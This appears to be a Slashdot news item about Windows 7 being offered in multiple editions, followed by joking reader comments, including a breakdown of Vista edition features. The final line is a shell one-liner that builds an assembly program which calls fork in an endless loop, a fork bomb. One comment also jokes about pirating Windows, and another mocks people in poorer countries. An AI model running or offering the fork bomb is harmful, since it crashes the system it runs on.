Windows 7 To Come In Multiple Versions
Crazy Taco writes "Tom's Hardware reports on newly discovered screenshots that reveal Microsoft is planning to release their newest version of Windows in multiple confusing versions ... again. The information comes from the latest version of the Windows 7 beta, build 7025 (the public beta is build 7000), and shows a screen during installation that asks the user which version of the OS he or she would like to install. Who's up for guessing what the difference is between Windows 7 'Starter' and Windows 7 'Home Basic?'"
Windows Starter edition comes without the Pipes screensaver?
I'll just hold out for Windows Cool Ranch.
He left.
I, for one, won't be buying it.
If you want to cut out the middle man but still support your favorite artists, you can always download it from TPB and then donate $15 directly to Microsoft. Or go to one of their concerts and buy a t-shirt.
"I zero-index my hamsters" - Willtor (147206)
I don't know what all the flap is about. No matter what distinctions Microsoft will impose it'll boil down to just two versions... Server, and Bot-net!
Exactly. The only place I've heard about the "Disasterous Confusion" of vista's multiple versions is on Slashdot.
Who's up for guessing what the difference is between Windows 7 'Starter' and Windows 7 'Home Basic?
There is another method... it's far more effective than guessing. You could... look at the feature list.
http://www.microsoft.com/windows/windows-vista/compare-editions/default.aspx
OMG The confusion!!!
Let me break it down for ya'all
Do you need remote desktop?
Ultimate or Business.
Do you need Faxes?
Ultimate or Business.
Do you need Media Center?
Home Premium or Ultimate.
Do you want to burn DVDs and HD-DVDs out of the box?
Home Premium or Ultimate.
Do you live in a third world country and have flies on your face?
Home Basic
Was that REALLY so difficult?
It's not missing, it's on a secret mission to the neutral zone.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;